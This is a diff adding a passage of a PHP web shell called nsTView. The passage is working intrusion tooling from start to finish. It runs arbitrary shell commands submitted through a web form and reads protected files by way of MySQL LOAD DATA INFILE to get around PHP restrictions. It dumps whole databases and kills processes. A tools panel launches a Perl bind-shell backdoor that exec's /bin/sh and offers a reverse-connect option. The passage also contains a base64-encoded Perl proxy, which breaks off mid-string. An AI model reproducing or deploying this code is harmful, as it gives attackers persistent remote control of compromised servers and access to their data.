+print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
+print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
+}
+
+}#end of rename
+
+
+# dump table
+if($_GET['dump']){
+if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
+<font color=green><b>You can change temp folder for dump file in your browser!<br>
+<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
+Then press enter</b></font>
+</font>");}
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db ) Table ( $tbl )
+# --- eof ---
+
+");
+$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
+$row = mysql_fetch_row($que);
+fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$que = mysql_query("SELECT * FROM `$tbl`");
+if(mysql_num_rows($que)>0){
+while($row = mysql_fetch_assoc($que)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = implode("', '", $values);
+$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
+fwrite($fp, $sql);
+}
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of dump
+
+
+
+
+# db dump
+if($_GET['dump_db']){
+$c=mysql_num_rows(mysql_list_tables($db));
+if($c>=1){
+print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
+}else{
+print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
+die;
+}
+if(sizeof($tabs)==0){
+$res = mysql_query("SHOW TABLES FROM $db");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_row($res)){
+$tabs[] .= $row[0];
+}
+}
+}
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db )
+# --- eof ---
+
+");
+foreach($tabs as $tab) {
+fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
+$res = mysql_query("SHOW CREATE TABLE `$tab`");
+$row = mysql_fetch_row($res);
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$res = mysql_query("SELECT * FROM `$tab`");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_assoc($res)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = join("', '", $values);
+$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
+fwrite($fp, $sql);
+}}
+fwrite($fp, "\r\n\r\n\r\n");
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of db dump
+
+
+
+
+
+
+$vnutr=$_GET['vnutr'];
+$tbl=$_GET['tbl'];
+if($vnutr and !$_GET['ins_new_line']){
+print "<table cellpadding=0 cellspacing=1><tr><td>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "
+Total: $cfa[0]
+<form>
+From: <input name=from size=3 value=0>
+To: <input name=to size=3 value='$cfa[0]'>
+<input type=submit name=show value=Show>
+<input type=hidden name=vnutr value=1>
+<input type=hidden name=vn value='$vn'>
+<input type=hidden name=db value='$db'>
+<input type=hidden name=login value='$login'>
+<input type=hidden name=pass value='$pass'>
+<input type=hidden name=adress value='$adress'>
+<input type=hidden name=conn value=1>
+<input type=hidden name=baza value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value='$tbl'>
+ [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
+</form></td></tr></table>";
+$vn=$_GET['vn'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+$result1= mysql_query($query);
+print $del_result;
+print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$type  = mysql_field_type($result, $i);
+$len  = mysql_field_len($result, $i);
+print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
+}
+print "</tr><pre>";
+
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach($mn as $key=>$inside){
+$buffer1 .= "`$key`='".adds($inside)."' AND ";
+$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
+}
+$buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
+$buffer1  = base64_encode($buffer1);
+print "<td>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=delete_row value='$buffer1'>
+<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
+</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=edit_row value='$buffer1'>
+<input type=submit value=Edit style='border:1px;background-color:green;'>
+</form>
+</td>\r\n";
+print $b1;
+print "</tr>";
+unset($b1);
+unset($buffer1);
+}
+
+
+
+mysql_free_result($result);
+print "</table>";
+} #end vnutr
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+}
+
+
+@$p=$_GET['p'];
+if(@$_GET['p']=="selfremover"){
+        print "<tr><td>";
+print "<font color=red face=verdana size=1>Are you sure?<br>
+<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
+Remove: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="NOT DELETED!!!";
+print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
+}else{$hmm="DELETED";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+
+
+
+if($os=="unix"){
+function fastcmd(){
+global $fast_commands;
+$c_f=explode("\n",$fast_commands);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os unix
+
+
+if($os=="win"){
+function fastcmd(){
+global $fast_commands_win;
+$c_f=explode("\n",$fast_commands_win);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands_win," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands_win);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os win
+
+
+echo "
+<tr><td>";
+if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
+";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>";
+print `$sh3`;
+echo "</pre>";
+}
+}
+
+if(@$_GET['sh311']=="2"){
+echo "<center>cmd<br>
+pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>"; print `$sh3`; echo "</pre>";}
+echo $copyr;
+exit;}
+
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
+";
+echo $copyr;
+exit;
+}
+
+
+$mkdir=$_GET['mkdir'];
+if($mkdir){
+print "<br><b>Create Folder in $d :</b><br><br>
+<form method=post>
+New folder name:<br>
+<input name=dir_n size=30>
+</form><br>
+";
+if($_POST['dir_n']){
+mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
+print "<b><font color=green>Directory created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$mkfile=$_GET['mkfile'];
+if($mkfile){
+print "<br><b>Create file in $d :</b><br><br>
+<form method=post>
+File name:<br>
+(example: hello.txt , hello.php)<br>
+<input name=file_n size=30>
+</form><br>
+";
+if($_POST['file_n']){
+$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
+fwrite($fp,"");
+print "<b><font color=green>File created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$ps_table=$_GET['ps_table'];
+if($ps_table){
+
+if($_POST['kill_p']){
+exec("kill -9 ".$_POST['kill_p']);
+}
+
+$str=`ps aux`;
+
+# You can put here preg_match_all for other distrib/os
+preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
+
+
+print "<br><b>PS Table :: Fast kill program<br>
+(p.s: Tested on Linux slackware 10.0)<br>
+<br></b>";
+print "<center><table border=1>";
+for($i=0; $i<count($matches[3]); $i++){
+$expl=explode(" ",$matches[0][$i]);
+print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
+}#end of for
+print "</table></center><br><br>";
+unset($str);
+print $copyr;
+die;
+}#end of ps table
+
+
+$read_file_safe_mode=$_GET['read_file_safe_mode'];
+if($read_file_safe_mode){
+
+if(!isset($_POST['l'])){$_POST['l']="root";}
+
+print "<br>
+Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
+<form method=post>
+<table>
+<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
+<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
+<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
+(example: /etc/hosts)<br>
+<input name=read_file size=45><br>
+<input type=submit value='Show content'>
+</form>
+<br>";
+
+if($_POST['read_file']){
+$read_file=$_POST['read_file'];
+@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
+mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
+mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
+$query = "SELECT * FROM tmp_file";
+$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
+print "<b>File content</b>:<br><br>";
+for($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);}
+while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach ($line as $key =>$col_value) {
+print htmlspecialchars($col_value)."<br>";}}
+mysql_free_result($result);
+mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+}
+
+
+print $copyr;
+die;
+}#end of read_file_safe_mode
+
+
+# sys
+$wich_f=$_GET['wich_f'];
+$delete=$_GET['delete'];
+$del_f=$_GET['del_f'];
+$chmod=$_GET['chmod'];
+$ccopy_to=$_GET['ccopy_to'];
+
+
+# delete
+if(@$_GET['del_f']){
+if(!isset($delete)){
+print "<font color=red>Delete this file?</font><br>
+<b>$d/$wich_f<br><br></b>
+<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
+";}
+if($delete==1){
+unlink($d."/".$del_f);
+print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
+<br><b> <a href='$php_self?d=$d'># BACK</a>
+";
+}
+echo $copyr;
+exit;
+}
+
+
+# copy to
+if($ccopy_to){
+$wich_f=$_POST['wich_f'];
+$to_f=$_POST['to_f'];
+print "<font color=green>Copy file:<br>
+$d/$ccopy_to</font><br>
+<br>
+<form method=post>
+File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
+To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
+<input type=submit value=Copy></form><br><br>
+";
+
+if($to_f){
+@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
+print "<font color=green><b>Copy success!!!</b></font><br>";
+}
+
+echo $copyr;
+exit;
+}
+
+
+# chmod
+if(@$_GET['chmod']){
+$perms = @fileperms($d."/".$wich_f);
+print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
+<br><center>This file chmod is</b> ";
+print perm($perms);
+print "</center>
+<br>";
+$chmd=<<<HTML
+
+<script>
+<!--
+
+function do_chmod(user) {
+        var field4 = user + "4";
+        var field2 = user + "2";
+        var field1 = user + "1";
+        var total = "t_" + user;
+        var symbolic = "sym_" + user;
+        var number = 0;
+        var sym_string = "";
+
+        if (document.chmod[field4].checked == true) { number += 4; }
+        if (document.chmod[field2].checked == true) { number += 2; }
+        if (document.chmod[field1].checked == true) { number += 1; }
+
+        if (document.chmod[field4].checked == true) {
+                sym_string += "r";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field2].checked == true) {
+                sym_string += "w";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field1].checked == true) {
+                sym_string += "x";
+        } else {
+                sym_string += "-";
+        }
+
+        if (number == 0) { number = ""; }
+        document.chmod[total].value = number;
+        document.chmod[symbolic].value = sym_string;
+
+        document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
+        document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
+}
+//-->
+</script>
+
+
+
+<form name="chmod" method=post>
+<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
+        <tr bgcolor="gray">
+                <td align="left"><b>Permission</b></td>
+                <td align="center"><b>Owner</b></td>
+                <td align="center"><b>Group</b></td>
+                <td align="center"><b>Other</b></td>
+                <td bgcolor="#dddddd" rowspan="4"> </td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Read</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Write</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Execute</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Octal:</td>
+                <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_group" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_other" value="" size="1"></td>
+                <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Symbolic:</td>
+                <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
+                <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
+        </tr>
+</table></td></tr></table></p>
+HTML;
+
+print "<center>".$chmd."
+
+<b>$d/$wich_f</b><br><br>
+<input type=submit value=CHMOD></form>
+</center>
+</form>
+";
+$t_total=$_POST['t_total'];
+if($t_total){
+chmod($d."/".$wich_f,$t_total);
+print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
+print "<a href='$php_self?d=$d'># BACK</a><br><br>";
+}
+echo $copyr;
+exit;
+}
+
+# rename
+if(@$_GET['rename']){
+print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$wich_f'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+
+@$rto=$_POST['rto'];
+
+if($rto){
+$fr1=$d."/".$wich_f;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+
+rename($fr1,$to1);
+print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
+
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
+
+}
+
+echo $copyr;
+exit;
+}
+
+
+
+
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="tools"){
+        # unix
+if($os=="unix"){
+print "
+<center><br>
+<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
+<table border=1>
+<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
+<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
+<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
+<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
+<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
+</table>
+</center>
+<br><Br>
+";
+}#end of unix
+
+
+if($_POST['perl_bd']){
+$port=$_POST['port'];
+$perl_bd_scp = "
+use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
+setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
+listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
+open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
+close X;}}";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl /tmp/nst_perl_bd.pl &");
+unlink("/tmp/nst_perl_bd.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &");
+unlink(".nst_bd_tmp/nst_perl_bd.pl");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_bd
+
+if($_POST['perl_proxy']){
+$port=$_POST['port'];
+$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbm